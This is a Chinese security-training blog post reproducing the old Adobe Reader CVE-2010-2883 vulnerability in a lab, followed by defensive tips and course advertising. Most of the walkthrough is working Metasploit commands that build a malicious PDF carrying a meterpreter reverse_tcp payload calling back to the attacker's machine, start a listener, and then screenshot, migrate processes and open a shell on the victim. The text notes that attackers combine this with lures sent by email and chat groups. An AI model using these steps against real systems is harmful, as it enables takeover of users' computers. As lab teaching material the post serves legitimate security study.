1/3
2/3
3/3
【陈鑫杰】“PDF打开即中招”的经典Adobe Reader漏洞复现,红队高级渗透测试必备
拼客学院陈鑫杰
2020年10月11日 20:00
收录于文集
共28篇

在“漏洞界”,据称有两种大山是其他软件永远无法匹敌的,一个是 Microsoft 的 Office 套件,一个是 Adobe 的全家桶。

这两家出的漏洞,无论在出洞频率、攻击危害性、或者是影响范围等多个维度来看,都直接将其他软件远远甩开。如果要较真起来,到底谁是“漏洞之王”

相信Adobe一定能“摘得桂冠”。

Adobe全家桶里面的 Adobe Flash Player、Adobe Reader、Adobe Acrobat 等产品,可以说是“难兄难弟”了,每年都会贡献一大堆漏洞。很多人就会问,为什么就他们家的产品漏洞最多,别人家的呢?

其实,所有软件都或多或少有漏洞,没有绝对安全的软件,就看有没有人去挖掘而已。

Adobe系列因为桌面安装量非常庞大,而且官方似乎安全开发工作这块做的不是太好,大量的黑客或安全研究人员愿意投入更多的时间来“挖洞”,一个成熟可利用的 Adobe 0day 漏洞,价值连城毫不夸张。

这不,2018年2月份,Adobe Flash最新版就爆出 CVE-2018-4878 高危漏洞,可导致电脑直接被getshell。而同一月份,思科旗下安全团队 TALOS 披露了 Adobe Reader 最新版存在远程代码执行漏洞(CVE-2018-4901),简单来说,“打开PDF文件可能导致被getshell”。目前,Adobe已经发布了针对此漏洞的安全补丁。

由于 Adobe Reader CVE-2018-4901 暂时还没有成熟可用的渗透代码流传出来,所以目前并没有像 Adobe Flash CVE-2018-4878 引起更广泛的关注。

但是,我们要注意一点的是,此时此刻,必定有很多黑客正在尝试写攻击代码,准备发起新一轮攻击。

虽然我们没法直接对最新 CVE-2018-4901 进行复现,但从学习的角度,可以拿一个非常经典的老漏洞 CVE-2010-2883 来进行实践。这枚漏洞年限已久,但可以直接做出“打开pdf即刻中招”的效果,可以说是“简单暴力”的典范了。

CVE-2010-2883漏洞原理:“Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。”

影响版本:Adobe Reader 8.2.4 - 9.3.4

vx:pinginglab 官网:pinginglab.net

目前,Kali Linux Metasploit已经集成了相关的漏洞利用代码,我们可以用较快的速度,对此漏洞进行复现。

Kali Linux + Windows 7 sp1 

渗透机:Kali Linux (ip:172.16.70.216) 

靶机:Windows 7 sp1 (ip:172.16.70.199) 

软件:Adobe Reader 9.3.exe

注1:为了节省大家实验时间,此测试环境已打包好。获取方式: 关注公众号[拼客学院服务号](搜索pinginglab),回复关键词:CVE-2010-2883

注2:实验环境仅供个人学习测试,为防止被河蟹,请勿转发链接。

①进入 Kali Linux,使用 Metasploit 生成 PDF 木马文件

搜索 Adobe 渗透模块   

msf > search adobe_cooltype_sing 

调用渗透模块   

msf > use exploit/windows/fileformat/adobe_cooltype_sing/ 

查看模块详情   

msf exploit(adobe_cooltype_sing) > info

vx:pinginglab 官网:pinginglab.net

调用meterpreter载荷,反向连接到渗透机   

msf  exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp   

设置Kali Linux的IP地址   

msf  exploit(adobe_cooltype_sing) > set LHOST 172.16.70.216   

设置本地监听端口   

msf  exploit(adobe_cooltype_sing) > set LPORT 8888   

设置带有后门程序的PDF文件   

msf  exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf   

执行渗透生成文件   

msf  exploit(adobe_cooltype_sing) > exploit

vx:pinginglab 官网:pinginglab.net

②将PDF木马文件拷贝至Kali Linux桌面

root@kali:~# cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf

vx:pinginglab 官网:pinginglab.net

③Metasploit开启shell监听会话,等待肉鸡上线

使用handler监听模块   

msf > use exploit/multi/handler   

回弹一个tcp连接   

msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp   

设置监听IP地址(跟PDF木马文件一致)  

msf  exploit(handler) > set LHOST 172.16.70.216   

设置监听的端口(跟PDF木马文件一致)   

msf  exploit(handler) > set LPORT 8888   

开启监听   

msf  exploit(handler) > exploit

vx:pinginglab 官网:pinginglab.net

④ 在 Windows 7 安装 Adobe Reader 9.3

vx:pinginglab 官网:pinginglab.net

vx:pinginglab 官网:pinginglab.net

vx:pinginglab 官网:pinginglab.net

⑤ 将PDF木马文件拷贝到 Windows 7 并打开

vx:pinginglab 官网:pinginglab.net

vx:pinginglab 官网:pinginglab.net

⑥ Metasploit 获取 shell 会话,并用 Meterpreter 控制肉鸡

查看系统信息   

meterpreter > sysinfo 

查看当前用户   

meterpreter > getuid 

截屏   

meterpreter > screenshot

vx:pinginglab 官网:pinginglab.net

vx:pinginglab 官网:pinginglab.net

获取进程   

meterpreter > ps   

切换进程 

meterpreter > migrate 3748

注:考虑到这个漏洞利用过程,adobe reader会“卡壳”退出,所以需要快速切换到其他系统进程,这样会话才不会丢失。

vx:pinginglab 官网:pinginglab.net

vx:pinginglab 官网:pinginglab.net

vx:pinginglab 官网:pinginglab.net

获取Dos Shell   

meterpreter > shell 

C:\Windows\system32>ipconfig

vx:pinginglab 官网:pinginglab.net

实验总结:

可以看到,最终由于Adobe Reader 存在 CVE-2010-2883 这个高危漏洞,导致电脑打开特殊定制的pdf之后,直接变成肉鸡。与之前文章中的 Office 和 Flash 0day 漏洞类似,真实环境下,很多黑客会利用此方法,结合社会工程学,例如通过诱导邮件、各种论坛、QQ群、微信群等多渠道,诱导用户下载并打开,而只要打开的用户,就直接中招。

在这里也呼吁大家:平常要非常小心陌生办公文件,无论是pdf还是word等,打开之前一定要明确来源,或者用杀毒软件先杀毒,再打开。另外,就是尽量保证电脑的软件处于最新版,这样才能最大程度降低被攻击的几率。

①直接到Adobe官网,下载Adobe Reader最新版本; 

②安装常见杀毒软件,开启实时防护和杀毒引擎实时升级。


【up主介绍】

  • 陈鑫杰 拼客科技CEO / 拼客学院院长

  • 多年一线互联网 / 金融 / 政府信息安全技术支撑

  • 擅长网络安全 / Web安全 / 渗透测试 / 数字取证

  • 网警技术顾问 / 多次协助抓获大型诈骗团伙

  • 腾讯安全合作伙伴 / 共同打击灰黑产非法犯罪

  • 51CTO金牌讲师 / 330万+学员 / 安全类Top1

  • 知乎专栏作家 / bilibili知识领域优质up主

  • 人邮签约作者 / 曾出版高等院校指定教材

【精选内容】

  • ① 关于网络安全行业的一切,如何成为一名合格的白帽子黑客?网络安全-Web安全-渗透测试必备指南 

  • ② 零基础如何学习Web安全渗透测试?推荐这份史上最详细的自学路线图! 

  • ③ 网络安全到底在干啥?搞网络安全就是搞“黑客技术”?聊聊网络安全的知识体系和学习方向

  • ④ B站最壕“搞机”?曝光百万级网络安全实验室!防火墙入侵防御漏洞扫描等都齐了! 

  • ⑤ 作为一名白帽子黑客,如何打造自己的网络安全“军火库”?

【精选班级】

  • ①《全栈渗透测试定向人才班》拼客学院 x 奇安信 | 直播 + 面授 网页链接

  • ②《100天晋升Web白帽子黑客》https://www.pinginglab.net/classroom/12/introduction

  • ③《全栈网络安全专家》https://www.pinginglab.net/classroom/11/introduction

【了解更多】

  • 班主任vx:qiuzhiquanquan、tangtangbzr(添加时请备注“B站”)

  • vx公众号:拼客学院服务号(ID:pinginglab) 拼客院长陈鑫杰(ID:pingsec)

  • 学院官网:www.pinginglab.net(专注网络安全/Python开发/Linux云计算/大数据)